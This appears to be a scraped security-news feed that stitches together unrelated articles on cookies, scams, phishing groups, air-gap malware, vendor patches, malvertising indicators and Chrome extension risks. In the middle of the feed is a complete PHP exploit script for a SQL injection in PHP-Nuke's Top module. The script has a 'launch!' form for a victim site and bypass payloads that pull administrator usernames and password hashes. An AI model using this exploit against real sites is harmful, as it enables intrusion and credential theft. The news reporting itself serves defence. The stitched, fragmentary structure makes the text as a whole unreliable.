Earlier this year, Google ditched its plans to abolish support for third-party cookies in its Chrome browser. While privacy advocates called foul, the implications for users is not so clear cut.

The apparent death of cookies also won’t matter much to Google, which has a ton of data from multiple services in addition to Chrome and can target people without cookies.

According to Google's 2023 earnings report, $237.86 billion of the firm’s $307.39 billion in revenue came from ads. Ads on its search engine results page and other products including Gmail, Google Maps, and Google Play are the highest earner at a collective $175.03 billion, or 56.9 percent of overall revenue. YouTube ads bring in $31.51 billion (10.3 percent of the total), and Google Network ads including ads on Google’s partner sites come in at $31.31 billion, 10.2 percent of revenue. Network ad revenues were down by 4.5 percent last year, showing Google reliance on this area is reducing.

Google knows it’s quite possible privacy-conscious users will opt out of Chrome cookies, just as they did with Apple’s ATT, which saw Facebook taking a $10 billion hit. Now, ATT opt-in rates range from 12 percent to 40 percent across different app categories.

The mobile advertising industry has boomed over recent years, even with Apple’s ATT in place, says Jake Moore, global cybersecurity adviser at security outfit ESET. He calls the results of ATT “impressive” and suggests Google has been watching the outcome of Apple’s rules before implementing its own version.

Meanwhile, Google is already advising developers to act as if they don’t have cookies. The tech giant is working under the assumption that even if 80 percent do opt out, 20 percent of Chrome’s more than 3 billion users isn’t a bad result.

Ensuring users have a conscious choice over whether they use cookies or not is “a good step in practice,” says Simon Bain, CEO at data and analytics platform OmniIndex. But Google needs to consider how easy it is to opt out, he says.

“And is there a negative impact on opting out for users?” Bain says. “These are crucial because if opting out is buried in the privacy settings and there is a reduction in functionality or workflow as a result of not having them, then it is not really a fair or legitimate choice.”

**Informed Choice**

Google says its updated approach allows people to “make an informed choice that applies across their web browsing,” and says you’ll be able to “adjust that choice at any time.”

The plan is for this to be as usable as possible. Sources familiar with the matter confirmed Google’s current plan would be a prominent global prompt, meaning users would not be asked to make choices on a site-by-site basis.

Yet some experts question Google’s motives. Sean Wright, an independent security researcher, points out that Google has “an enormous amount of data on individuals,” which gives a lot of power to “a single entity.”

This level of control could put user privacy at risk, Wright says. “My concern is that you have a large company that is already well established, developing its own ecosystem with little competition. There seems little incentive to enhance the privacy of users.”

But Google argues that it has received feedback from “a wide variety of stakeholders,” including regulators such as the UK’s Competition and Markets Authority, publishers, web developers and standards groups, civil society, and participants in the advertising industry. “This has helped us craft solutions that aim to support a competitive and thriving marketplace that works for publishers and advertisers, and encourage the adoption of privacy-enhancing technologies,” the company says.

Even so, privacy is a difficult balance to strike for the world’s biggest browser whose business model is designed to rely on advertising.

This is already well known, and if you care about your privacy, it’s possible you’ve already ditched Chrome for another browser. If you haven’t, Chrome alternatives include Apple’s Safari, Brave, Vivaldi, Firefox, and the DuckDuckGo browser. Brave and Vivaldi and based on the same Chromium engine as Chrome, so they include some of the same functionality.

What Google's U-Turn on Third-Party Cookies Means for Chrome Privacy

This week on the Lock and Code podcast, we speak with Zach Hinkle and Pieter Arntz about the Facebook funeral livestream scam.

_This week on the Lock and Code podcast…_

Online scammers were seen this August stooping to a new low—abusing local funerals to steal from bereaved family and friends.

Cybercrime has never been a job of morals (calling it a “job” is already lending it too much credit), but, for many years, scams wavered between clever and brusque. Take the “Nigerian prince” email scam which has plagued victims for close to two decades. In it, would-be victims would receive a mysterious, unwanted message from alleged royalty, and, in exchange for a little help in moving funds across international borders, would be handsomely rewarded.

The scam was preposterous but effective—in fact, in 2019, CNBC reported that this very same “Nigerian prince” scam campaign resulted in $700,000 in losses for victims in the United States.

Since then, scams have evolved dramatically.

Cybercriminals today willl send deceptive emails claiming to come from Netflix, or Google, or Uber, tricking victims into “resetting” their passwords. Cybercriminals will leverage global crises, like the COVID-19 pandemic, and send fraudulent requests for donations to nonprofits and hospital funds. And, time and again, cybercriminals will find a way to play on our emotions—be they fear, or urgency, or even affection—to lure us into unsafe places online.

This summer, Malwarebytes social media manager Zach Hinkle encountered one such scam, and it happened while attending a funeral for a friend. In a campaign that Malwarebytes Labs is calling the “Facebook funeral live stream scam,” attendees at real funerals are being tricked into potentially signing up for a “live stream” service of the funerals they just attended.

Today on the Lock and Code podcast with host David Ruiz, we speak with Hinkle and Malwarebytes security researcher Pieter Arntz about the Facebook funeral live stream scam, what potential victims have to watch out for, and how cybercriminals are targeting actual, grieving family members with such foul deceit. Hinkle also describes what he felt in the moment of trying to not only take the scam down, but to protect his friends from falling for it.

> “You’re grieving… and you go through a service and you’re feeling all these emotions, and then the emotion you feel is anger because someone is trying to take advantage of friends and loved ones, of somebody who has just died. That’s so appalling”

Tune in today to listen to the full conversation.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.**

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

 Exposing the Facebook funeral livestream scam (Lock and Code S05E21) 

The Top module for PHP-Nuke versions 6.x and below 7.6 suffers from a remote SQL injection vulnerability.

# Exploit Title: PHP-Nuke ( SQL injection Top Module + protection Bypass )# Google Dork: intext: Powered by PHP-Nuke# Date: 2024-10-07# Exploit Author: Emiliano Febbi# Vendor Homepage: https://phpnuke.org/# Software Link: https://sourceforge.net/projects/phpnuke/files/phpnuke/# Version: 6.x < 7.6# Tested on: Windows 10[code] ->New concept of exploit writing, CMS protections are useless. ->Very fast usage.<?phpecho '<html><head><title>PHP-Nuke SQL injection / Bypass Protections</title></head><body><center><body bgcolor="black"><body link="yellow"><pre>new exploit concept#######################################################################This exploit is for Top Module of PHP-Nuke 6.x < 7.6 ##auto-bypass *illegal operation* , *mod security* , *NukeSentinel* ##allowed http and https protocols. Code by Emiliano Febbi #######################################################################</pre><form action="'.$SERVER[PHP_SELF].'" method="POST">~ insert victim site ~ (*the folder must be specified) <input type="text" name="victim" value="http://www.site.com"> <label for="dlt">++method++</label><select name="exploit_nuke" id="lang"><option value="one">#1</option><option value="two">#2</option></select> <input type="submit" value="launch!"/> </form></body></html>';if($_POST['victim']) { $site = $_POST['victim']; $j = $_POST['exploit_nuke']; switch ($j) { /*#method1*/ case "one": /*#Get info from victim site*/ if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a> "; else echo "~missing Admin Login "; if (false!==file("$site/modules.php?name=Top")) echo "#Top Module Active! "; else echo "#Top Module not Active! "; print '-------------------------------------- '; /*#Get user1*/ print "#user1: "; $content_user=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--"); $comment_user=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user); $comment_user=explode("</a>",$comment_user[1]); var_dump(strip_tags($comment_user[0])); echo " "; /*#Get pwd1*/ print "#password1: "; $content=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--"); $comment=explode('<a href="modules.php?name=Surveys&pollID=1">',$content); $comment=explode("</a>",$comment[1]); var_dump(strip_tags($comment[0])); echo " "; /*#Get user2*/ print "#user2: "; $content_user2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--"); $comment_user2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user2); $comment_user2=explode("</a>",$comment_user2[2]); var_dump(strip_tags($comment_user2[0])); echo " "; /*#Get pwd2*/ print "#password2: "; $content2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--"); $comment2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content2); $comment2=explode("</a>",$comment2[2]); var_dump(strip_tags($comment2[0])); echo " "; break;/*###################################################################################################################################*/ case "two": /*#method2*/ /*#Get info from victim site*/ if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a> "; else echo "~missing Admin Login "; if (false!==file("$site/modules.php?name=Top")) echo "#Top Module Active! "; else echo "#Top Module not Active! "; print '-------------------------------------- '; /*#Get user1*/ print "#user1: "; $content_userj=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--"); $comment_userj=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userj); $comment_userj=explode("</a>",$comment_userj[1]); var_dump(strip_tags($comment_userj[0])); echo " "; /*#Get pwd1*/ print "#password1: "; $content_userp=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--"); $comment_userp=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userp); $comment_userp=explode("</a>",$comment_userp[1]); var_dump(strip_tags($comment_userp[0])); echo " "; /*#Get user2*/ print "#user2: "; $content_userz=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--"); $comment_userz=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userz); $comment_userz=explode("</a>",$comment_userz[2]); var_dump(strip_tags($comment_userz[0])); echo " "; /*#Get pwd2*/ print "#password2: "; $content_userq=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--"); $comment_userq=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userq); $comment_userq=explode("</a>",$comment_userq[2]); var_dump(strip_tags($comment_userq[0])); echo " "; break; };; };;;?>[/code]

PHP-Nuke Top Module SQL Injection

The Storm-1575 group is known for frequently rebranding its phishing infrastructure. Recently, ANY.RUN analysts identified the deployment of…

The Storm-1575 group is known for frequently rebranding its phishing infrastructure. Recently, ANY.RUN analysts identified the deployment of new login panels, which are part of the threat actor’s ongoing efforts to compromise users’ Microsoft and Google accounts.

****Storm-1575’s New Login Panels****

Through analysis of their features, the team was able to link login panels to Storm-1575. Among other things, the panels share:

*   Phishing domains 
*   Random panel page headers
*   Use of website templates to mask servers 
*   Panel token verification request, the same font, and the panel URL 

_Comparison of Storm-1575’s phishkits_

The panels also have their distinctive features:

*   **Target Accounts**: Microsoft vs. Google 
*   **Verification**: Cloudflare for Microsoft, arithmetic CAPTCHA for Google 
*   **Encryption**: Strong AES CryptoJS for Microsoft, weak obfuscation for Google

The findings confirm that these panels are operated by Storm-1575, a group that previously used the same infrastructure with other phishing platforms such as DadSec, Phoenix Panel, and Rockstar2FA Portal.

****How to Proactively Discover New Storm-1575 Attacks****

To stay ahead of Storm-1575’s latest phishing tactics, cybersecurity professionals can use ANY.RUN’s Threat Intelligence Lookup. 

This powerful platform offers a centralized repository of threat data from ANY.RUN’s malware sandbox sessions, enable users to investigate emerging threats with access to indicators of compromise, network activity, and file behaviours. 

One example of Storm-1575’s phishing infrastructure is the domain menlologistics.com. By submitting this domain to the TI Lookup platform, users can uncover key details about its malicious activity.

_Search by the domain name in ANY.RUN TI Lookup_

A search query for **domainName:”menlologistics.”** revealed 4 associated IP addresses and 69 sandbox sessions in ANY.RUN, most of which were linked to phishing activities.

Analysts can also investigate by threat name using **threatName:”storm1575″**, granting direct access to any recorded session where this threat was detected in the ANY.RUN sandbox.

_Search by the threat name in ANY.RUN TI Lookup_

This integration between TI Lookup and the sandbox provides a comprehensive view of the threat landscape, enabling users to review real-time phishing tactics and infrastructure in action.

****ANY.RUN Threat Intelligence Portal****

If you’re looking to enhance your threat intelligence capabilities, explore ANY.RUN’s TI portal to gain deeper insights into the world of cyber threats and strengthen your defences.

Test ANY.RUN’s Threat Intelligence Lookup to see how it can improve your threat-hunting efforts.

1.  Analysis of Top Infostealers: Redline, Vidar and Formbook
2.  PythonAnywhere Cloud Platform Abused for Hosting Ransomware
3.  Tycoon and Storm-1575 Linked to Phishing Attacks on US Schools
4.  ANY.RUN Upgrades Threat Intelligence to Identify Emerging Threats
5.  StormBamboo APT Targets ISPs, Spreads Malware via Software Updates

Storm-1575 Threat Actor Deploys New Login Panels for Phishing Infrastructure

A little-known threat actor tracked as GoldenJackal has been linked to a series of cyber attacks targeting embassies and governmental organizations with an aim to infiltrate air-gapped systems using two disparate bespoke toolsets.
Victims included a South Asian embassy in Belarus and a European Union government (E.U.) organization, Slovak cybersecurity company ESET said.
"The ultimate goal of

A little-known threat actor tracked as **GoldenJackal** has been linked to a series of cyber attacks targeting embassies and governmental organizations with an aim to infiltrate air-gapped systems using two disparate bespoke toolsets.

Victims included a South Asian embassy in Belarus and a European Union government (E.U.) organization, Slovak cybersecurity company ESET said.

"The ultimate goal of GoldenJackal seems to be stealing confidential information, especially from high-profile machines that might not be connected to the internet," security researcher Matías Porolli noted in an exhaustive analysis.

GoldenJackal first came to light in May 2023, when Russian security vendor Kaspersky detailed the threat cluster's attacks on government and diplomatic entities in the Middle East and South Asia. The adversary's origins stretch back to at least 2019.

An important characteristic of the intrusions is the use of a worm named JackalWorm that's capable of infecting connected USB drives and delivering a trojan dubbed JackalControl.

While there is insufficient information to conclusively tie the activities to a specific nation-state threat, there is some tactical overlap with malicious tools used in campaigns linked to Turla and MoustachedBouncer, the latter of which has also singled out foreign embassies in Belarus.

ESET said it discovered GoldenJackal artifacts at a South Asian embassy in Belarus in August and September 2019, and again in July 2021. Of particular interest is how the threat actor also managed to deploy a completely revamped toolset between May 2022 and March 2024 against an E.U. government entity.

"With the level of sophistication required, it is quite unusual that in five years, GoldenJackal managed to build and deploy not one, but two separate toolsets designed to compromise air-gapped systems," Porolli pointed out. "This speaks to the resourcefulness of the group."

The attack against the South Asian embassy in Belarus is said to have made use of three different malware families, in addition to JackalControl, JackalSteal, and JackalWorm -

*   **GoldenDealer**, which is used to deliver executables to the air-gapped system via compromised USB drives
*   **GoldenHowl**, a modular backdoor with capabilities to steal files, create scheduled tasks, upload/download files to and from a remote server, and create an SSH tunnel, and
*   **GoldenRobo**, a file collector and data exfiltration tool

The attacks targeting the unnamed government organization in Europe, on the other hand, have been found to rely on an entirely new set of malware tools mostly written in Go. They are engineered to collect files from USB drives, spread malware via USB drives, exfiltrate data, and use some machine servers as staging servers to distribute payloads to other hosts -

*   **GoldenUsbCopy** and its improved successor **GoldenUsbGo**, which monitor USB drives and copy files for exfiltration
*   **GoldenAce**, which is used to propagate the malware, including a lightweight version of JackalWorm, to other systems (not necessarily those that are air-gapped) using USB drives
*   **GoldenBlacklist** and its Python implementation **GoldenPyBlacklist**, which are designed to process email messages of interest for subsequent exfiltration
*   **GoldenMailer**, which sends the stolen information to attackers via email
*   **GoldenDrive**, which uploads stolen information to Google Drive

It's currently not known as to how GoldenJackal manages to gain initial compromise to breach target environments. However, Kaspersky previously alluded to the possibility of trojanized Skype installers and malicious Microsoft Word documents as entry points.

GoldenDealer, which is already present in a computer connected to the internet and delivered via an as-yet-undetermined mechanism, springs into action when a USB drive is inserted, causing itself and an unknown worm component to be copied into the removable device.

It's suspected that the unknown component is executed when the infected USB drive is connected to the air-gapped system, following which GoldenDealer saves information about the machine to the USB drive.

When the USB device is inserted into the aforementioned internet-connected machine a second time, GoldenDealer passes the information stored in the drive to an external server, which then responds with appropriate payloads to be run on the air-gapped system.

The malware is also responsible for copying the downloaded executables to the USB drive. In the last stage, when the device is connected to the air-gapped machine again, GoldenDealer takes the copied executables and runs them.

For its part, GoldenRobo is also executed on the internet-connected PC and is equipped to take the files from the USB drive and transmit them to the attacker-controlled server. The malware, written in Go, gets its name from the use of a legitimate Windows utility called robocopy to copy the files.

ESET said it has yet to uncover a separate module that takes care of copying the files from the air-gapped computer to the USB drive itself.

"Managing to deploy two separate toolsets for breaching air-gapped networks in only five years shows that GoldenJackal is a sophisticated threat actor aware of network segmentation used by its targets," Porolli said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GoldenJackal Target Embassies and Air-Gapped Systems Using Malware Toolsets

Qualcomm has rolled out security updates to address nearly two dozen flaws spanning proprietary and open-source components, including one that has come under active exploitation in the wild.
The high-severity vulnerability, tracked as CVE-2024-43047 (CVSS score: 7.8), has been described as a user-after-free bug in the Digital Signal Processor (DSP) Service that could lead to "memory corruption

Mobile Security / Privacy

Qualcomm has rolled out security updates to address nearly two dozen flaws spanning proprietary and open-source components, including one that has come under active exploitation in the wild.

The high-severity vulnerability, tracked as CVE-2024-43047 (CVSS score: 7.8), has been described as a user-after-free bug in the Digital Signal Processor (DSP) Service that could lead to "memory corruption while maintaining memory maps of HLOS memory."

Qualcomm credited Google Project Zero researcher Seth Jenkins-Google Project Zero and Conghui Wang for reporting the flaw, and Amnesty International Security Lab for confirming in-the-wild activity.

"There are indications from Google Threat Analysis Group that CVE-2024-43047 may be under limited, targeted exploitation," the chipmaker said in an advisory.

"Patches for the issue affecting FASTRPC driver have been made available to OEMs together with a strong recommendation to deploy the update on affected devices as soon as possible."

The full scope of the attacks and their impact is presently unknown, although it's possible that it may have been weaponized as part of spyware attacks targeting civil society members.

October's patch also addresses a critical flaw in the WLAN Resource Manager (CVE-2024-33066, CVSS score: 9.8) that's caused by an improper input validation and could result in memory corruption.

The development comes as Google released its own monthly Android security bulletin with fixes for 28 vulnerabilities, which also comprise issues identified in components from Imagination Technologies, MediaTek, and Qualcomm.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Qualcomm Urges OEMs to Patch Critical DSP and WLAN Flaws Amid Active Exploits

Okta fixed a vulnerability in its Classic product that allowed attackers to bypass sign-on policies. Exploitation required valid…

Okta fixed a vulnerability in its Classic product that allowed attackers to bypass sign-on policies. Exploitation required valid credentials and the use of an “unknown” device. Affected users should review system logs.

Okta, a leading identity and access management provider, recently announced patching a critical security vulnerability affecting its Classic product. The flaw, which could allow attackers to bypass application-specific sign-on policies, originated in a July 17, 2024 update and remained exploitable until the issue was patched on October 4, 2024.

The vulnerability, now addressed in Okta’s production environment, could have allowed unauthorized access to applications by bypassing key security controls, including device-type restrictions, network zones, and certain authentication requirements.

However, **Okta** confirmed that the vulnerability only affected organizations using Okta Classic, and exploitation was contingent on a combination of factors, limiting the scope of the vulnerable systems.

****What Happened?****

Okta identified the vulnerability on September 27, 2024, and after an internal investigation, determined that it had originated from a software update rolled out on July 17, 2024. The issue was specific to Okta Classic and impacted organizations that had configured application-specific sign-on policies, especially those that relied on device-type restrictions or additional conditions outside the platform’s Global Session Policy.

According to Okta’s security advisory, an attacker would need to meet several conditions to carry out a successful attack. First, the attacker needed access to valid credentials—either through phishing, credential stuffing, or brute-force attacks. Second, the organization had to be using application-specific sign-on policies.

Lastly, the attacker had to be using a device or script that Okta evaluated as an “unknown” user-agent type, which might evade detection by standard device-type restrictions. Once these conditions were met, the attacker might have bypassed sign-on policies that typically require additional layers of authentication or device verification.

Okta has provided specific search recommendations that administrators can use to identify potential exploit attempts in their logs. This includes looking for unexpected successful authentication events where the device type was flagged as “unknown.” Okta also advised customers to search for unsuccessful authentication attempts, which could indicate credential-based attacks preceding a successful login.

Additionally, organizations were encouraged to monitor for deviations in user behaviour, such as unfamiliar IP addresses, geolocations, or access times that could signal unauthorized activity.

**Piyush Pandey**, CEO of identity and access security provider Pathlock, provided insight into the broader implications of such vulnerabilities. Speaking with HackRead.com, Pandey emphasized the importance of rigorous access risk analysis and compliant provisioning of users.

“Automated password management alone is insufficient to secure unauthorized regulated application access risk,” Pandey said. “By focusing on stringent access risk analysis and the compliant provisioning of users, including rigorous management of third-party identities and access, organizations can significantly bolster their security posture, safeguard sensitive data, and ensure compliance with regulatory requirements. This proactive approach protects customer data and trust and enhances overall resilience.

Pandey’s comments highlight the need for organizations to go beyond basic password management and embrace a more comprehensive approach to identity security, especially given the increasing sophistication of cyberattacks.

Organizations affected by this vulnerability are encouraged to follow **Okta’s detailed guidance** to ensure no unauthorized access occurs during the timeframe in question and to adopt stronger access management practices moving forward.

1.  **Okta Breach Linked to Employee’s Google Account**
2.  **Dropbox Abused in Phishing Scam to Steal SaaS Logins**
3.  **Live Nation Confirms Massive Ticketmaster Data Breach**
4.  **LAPSUS$ Hackers Leak Trove of Data, Breach Microsoft, Okta**
5.  **Customer Used Flawed 3rd-Party Tool, Exposed Twilio Call Records**

Okta Fixes Critical Vulnerability Allowing Sign-On Policy Bypass

Malicious Google sponsored results disguised as software downloads lead to malware.

After what seemed like a long hiatus, we’ve observed threat actors returning to malvertising to drop malware disguised as software downloads. The campaign we identified is high-impact, going after utility software such as Slack, Notion, Calendly, Odoo, Basecamp, and others. For this blog, we decided to focus on the Mac version of communication tool Slack.

Following the creation of advertiser identities belonging to real businesses, the threat actors launch their malicious ads, hiding their infrastructure behind several layers of fingerprinting and cloaking.

We have reported these incidents to Google and the related advertisers have been banned. However, we are still finding new malicious ads and hearing from others seeing the same, indicating that this campaign is not over yet.

**Wanted: Utility software**

The threat actor is abusing various platforms to host their payloads, giving insights into what they are choosing to lure in victims. For Windows users, all payloads were found in various GitHub accounts which we have reported already.

For Mac, we saw payloads originating from the same domain via PHP scripts using identifiers. These appear to be created for individual and perhaps time-based downloads. Other links that include the name of the software (i.e. _clockify\_mac.php_) work regardless.

creativekt\[.\]com/macdownloads/script\_6703ea1fc058e8.92130856.php  
creativekt\[.\]com/macdownloads/script\_66ffc3cf465a45.36592714.php  
creativekt\[.\]com/macdownloads/clockify\_mac.php  
creativekt\[.\]com/macdownloads/script\_66e6ba358cd842.42527539.php

**Impersonating two identities at once**

When we searched for Slack from the US, the top Google result was an ad that looked completely trustworthy. It had the brand’s logo, official website and even detailed description.

If you follow this blog, you probably know there is more to it. By clicking on the three dots next to the ad, you can see more information about the advertiser, which in this case is a law firm.

_Note: We understand that most users will not—for lack of time, interest or knowledge—take this step, which is why we offer solutions such as Malwarebytes Browser Guard that automatically blocks ads._

The “My Ad Center” vignette shows that the advertiser was not verified yet, but we were able to access their profile and see their collection of ads. There were four ads in total, and three of them were related to lawyer services using the name and address of a real company in the US.

The Slack ad was somewhat the odd one sticking out but could, in theory, have been promoted by this advertiser. What we believe is the problem with Google ads is how any advertiser can still use the branding of a major company as if they were them. From the point of view of internet users, this is extremely deceiving and provides no rail guard against abuse.

After we validated the ad ourselves and saw where it redirected to (a malicious site), we reported it to Google. Very shortly thereafter, Google took action and removed not just the ad, but the advertiser.

However, a couple of days later a new ad appeared, once again using a stolen identity this time from a women’s health company.

**Decoy site and payload**

As we have seen before, the malicious ad starts a redirection chain made of various click trackers, cloaking and a decoy site. This allows victim profiling, but more importantly it is used to avoid automated detection in order to keep the ad up and running as long as possible.

Victims eventually land on a decoy sites, similar to those used for phishing credentials, except here the end goal is to trick users into downloading malware.

Windows users get their respective payload hosted on GitHub. The binaries have been inflated into large files to hinder sandbox analysis and are likely Rhadamathys infostealer.

For Apple users, the installers are also an infostealer, branched out of the AMOS (Atomic Stealer) family. Passwords and other secrets found on a system within the file system, browsers, extensions and apps are grabbed and uploaded as a zip archive onto a remote server located in Russia:

**Conclusion**

When we investigate ads, we use a simple yet realistic setup that mimics what most users would have. This is not an automated process, which sometimes requires multiple attempts from different geographic locations and browser profiles. While this work can be tedious and time consuming, we believe it is necessary in order to identify threat actors at the source, therefore providing protection to the Malwarebytes customer base, but also anyone else that uses the Google search engine.

Slack is not the only brand that threat actors like to impersonate. In fact, we also saw and reported malicious ads for the productivity suite Notion. We noticed that it also shared the same payload hosting infrastructure, indicating that the two campaigns were related.

If you are still clicking on ads to download software, you take a risk by allowing fraudulent advertisers to redirect you to malicious sites. Inadvertently installing malware and getting your identity stolen has never been easier.

We recommend paying special attention to sponsored results or adopting a tool such as Malwarebytes Browser Guard. For our Mac users, we detect this threat as OSX.Poseidon.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**Indicators of Compromise**

Malicious domains

creativekt\[.\]com  
slack\[.\]designexplorerapp\[.\]net  
odoo\[.\]studioplatformapp\[.\]net  
notion\[.\]foreducationapp\[.\]com  
slack\[.\]workmeetingsapp\[.\]com

Payloads (Windows)

9c8dadbb45f63fb07fd0a6b6c36c7aa37621bbadc1bcc41823c5aad1b0d3e93e  
2b587ca6eb1af162951ade0e214b856f558cc859ae1a8674646f853661704211  
e3557fb78e8fca926cdb16db081960efc78945435b2233fbd80675c21f0bc2e2  
637b3ac5b315fd77b582dff2b55a65605f2782a717bed5aa6ef3c9722e926955  
79017a6a96b19989bcf06d3ceaa42fd124a0a3d7c7fca64af9478e08e6c67c72  
6eb1e3abf8a94951a661513bee49ffdbecfc8f7f225de83fa9417073814d4601  
de7b5e6c7b3cee30b31a05cc4025d0e40a14d5927d8c6c84b6d0853aea097733  
77615ea76aedf283b0e69a0d5830035330692523b505c199e0b408bcccd147b7

Payloads (Mac)

b55f2cb39914d84a4aa5de2f770f1eac3151ca19615b99bda5a4e1f8418221c2  
9dc9c06c73d1a69d746662698ac8d8f4669cde4b3af73562cf145e6c23f0ebdd

Command and control servers

85.209.11\[.\]155  
193.3.19\[.\]251

 Large scale Google Ads campaign targets utility software 

Google's Manifest V3 offers better privacy and security controls for browser extensions than the previous M2, but too many lax permissions and gaps remain.

Source: QubixStudio via Shutterstock

Malicious browser extensions are bypassing Google's latest security and privacy standard for Chrome extensions, and they are finding their way into the Chrome Web Store — putting organizations and individuals at considerable risk.

That's according to researchers at Singapore-based SquareX, who recently demonstrated how bad actors could sneak harmful browser add-ons past the protections in Google's latest Manifest V3 update for Chrome extensions.

**Malicious Chrome Extensions Are a Continuing Problem**

In a presentation at DefCon 32, the researchers showed how such extensions could steal live video feeds from platforms like Google Meet and Zoom without requiring any special permissions. They then demonstrated how attackers could use extensions based on the Manifest V3 standard to redirect users to credential-stealing pages, add collaborators to private GitHub repos, and steal site cookies, browsing history, and other user data relatively easily.

Google introduced Manifest V3 in 2018 to address issues in the previous Manifest V2 standard, which more easily allowed bad actors to craft Chrome extensions with a range of malicious capabilities. A study by researchers at Stanford University concluded that there were a staggering 280 million installs of such malicious Chrome extensions between July 2020 and February 2023.

Related:Dark Reading Confidential: The CISO and the SEC

As Google explains it, Manifest V3 is part of a broader effort by the company to "improve the privacy, security, and performance of extensions." Improvements in Manifest V3 include a stricter content security policy, updated and more secure APIs, more granular permission control for users, and changes to how extensions can make cross-origin requests. Some of the updates, like one that changes how Chrome handles content-blocking extensions, have been controversial. Privacy advocates and makers of ad-blocking extensions have described the feature as drastically curtailing the ability for Chrome users to block ads and tracking mechanisms. But overall, the goal with Manifest V3 is improved security and privacy controls around Chrome extensions.

The ground reality is somewhat different, says Vivek Ramachandran, CEO and founder of SquareX. "\[Manifest V3's\] permission model remains too broad, allowing malicious actors to exploit minimal permissions to steal data," he says.

**Overly Broad Permissions for Manifest V3?**

A key example is host permissions that allow an extension to modify or read any Web content on visited pages. "SquareX demonstrated a Google Meet stream-stealing extension that only required host permission," Ramachandran says. "This type of permission is very common in the extension store. In fact, many extensions, like grammar checkers, rely on it."

Related:Mideast, Turkey Cyber Threats Spike, Prompting Defense Changes

Ramachandran estimates there are already hundreds if not thousands of malicious browser extensions based on Manifest V3 that are already in the Chrome Web Store. He expects that number to increase dramatically as more extensions cut over to Manifest V3.

"Google needs to enforce stricter security controls in MV3," Ramachandran says. "They should collaborate with the Web and security community to develop a more robust permission model that is less broad. Additionally, Google should improve the vetting process for extensions and introduce tools to monitor real-time behavior."

Google did not immediately respond to a Dark Reading request for comment on SquareX's research. But the Internet giant previously has conceded that with more than 250,000 browser extensions in Chrome Web Store, there are chances some extensions could pose risks to users and sometimes request permissions that might violate a company's policies.  

"As with any software, extensions can also introduce risk," Google said in a blog post shortly after the Stanford researchers released their paper on risky extensions in the Chrome Web Store.

Related:Salt Typhoon APT Subverts Law Enforcement Wiretapping: Report

**Boosting Chrome Ecosystem Security**

In that blog post and in previous updates, like this one in April 2023, Google has highlighted its efforts to bolster security around Chrome extensions. These include browser extension management capabilities that security teams can use to view and set policies for all installed extensions in their environment, and the ability to review extensions before users can install them.

Chrome security features also include one that alerts admins when a user might install a new browser extension, to make tracking and management easier. And last year, Google introduced two risk assessment tools — CRXcavator and Spin.AI Risk Assessment — that give enterprise admins a way to assess and score extensions for risk.

Google also points to its Chrome extensions page (chrome://extensions/) as a resource that individuals can use to see if their installed extensions pose a security risk; a warning panel appears on the page if Google detects any installed extensions as being suspicious. That definition includes: browsers suspected of containing malware; browsers that violate Chrome Web Store polices; unpublished — and therefore no longer supported extensions; and extensions that are not explicit about their privacy and data-collection practices.

Google had set a deadline of this past June for browser extension makers to migrate to Manifest V3 and has noted that it would also begin disabling Manifest V2 extensions in its pre-stable versions of Chrome at that time. The company has given enterprise organizations until June 2025 to migrate Manifest V2 extensions to the new version. As of Oct. 4, 60.4% of all Chrome browser extension have migrated to Manifest V3.

Ramachandran says enterprises should audit installed extensions and limit their permissions. His advice is that organizations also enable better visibility and control over extensions in the environment. Think of browsers like Chrome as complex platforms, much like operating systems, he suggests.

"Extensions run as internal applications, but endpoint security tools only have visibility at the process level," Ramachandran says. "They cannot assess or control what browser extensions are doing internally."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Malicious Chrome Extensions Skate Past Google's Updated Security

OpenMediaVault version 7.4.2-2 suffers from a PHP code injection vulnerability.

